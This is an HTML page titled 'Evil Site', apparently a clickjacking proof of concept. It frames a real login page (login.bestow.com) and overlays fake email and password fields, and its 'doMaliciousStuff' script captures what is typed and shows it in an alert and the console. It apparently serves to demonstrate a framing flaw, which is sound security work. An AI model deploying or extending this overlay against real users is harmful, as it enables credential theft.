<!DOCTYPE html>
<html lang='en'>
  <head>
    <meta charset='UTF-8'>
    <title>Evil Site</title>
    <style>
        html {
            margin: 0;
        }
        body {
            width: auto;
            margin: 0;
            height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
        iframe {
            z-index: 1;
            width: 100%;
            margin: auto;
            height: 100%;
        }
        .container {
            position: absolute;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            opacity: 1;
            width: 100%;
            margin-top: auto;
            bottom: auto;
            max-width: 800px;
            min-height: 100vh;
        }
        .jacked {
            max-width: 668px;
            width: 100%;
            margin-top: auto;
            margin-bottom: auto;
            padding: 150px 64px 96px 64px;
            z-index: 2;
        }
        .jacked > input {
            width: 100%;
            font-family: Montserrat, Arial, serif;
            font-size: 20px;
            height: 32px;
            padding: 10px;
        }
        #password {
            margin-top: 8px;
        }
        .jacked > button {
            display: block;
            font-family: Montserrat, Arial, serif;
            font-size: 20px;
            padding: 1rem 2rem;
            opacity: 1;
            margin-top: 58px;
            margin-left: auto;
            margin-right: auto;
            background-color: rgb(244, 183, 155);
            color: rgb(88, 88, 88);;
            border-radius: 1px;
            border: 0;
            cursor: pointer;
        }
        .header {
            height: 106px;
            top: 0;
            width: 100%;
            position: relative;
            z-index: 0;
        }
        .footer {
            width: 100%;
            height: 32px;
            margin-top: auto;
            margin-bottom: 0;
            padding: 2rem 0;
            justify-content: center;
            align-items: center;
            z-index: 0;
        }
    </style>
  </head>
  <body>
    <iframe src='https://login.bestow.com'></iframe>
    <div id='container' class='container'>
      <div id='header' class='header'></div>
      <div id='jacked' class='jacked'>
        <input type='text' id='email' name='email' placeholder=Email>
        <input type='text' id='password' name='password' placeholder=Password>
        <button onclick='doMaliciousStuff()'>Login</button>
      </div>
      <div id='footer' class='footer'></div>
    </div>
    <script>
      function doMaliciousStuff() {
        const email = document.getElementById("email").value;
        const password = document.getElementById("password").value;
        alert(`Jacked your info!\n\nEmail: ${email}\nPassword: ${password}`);
        console.log(`Jacked your email! ${email}`);
        console.log(`Jacked your password! ${password}`);
      }
    </script>
  </body>
</html>
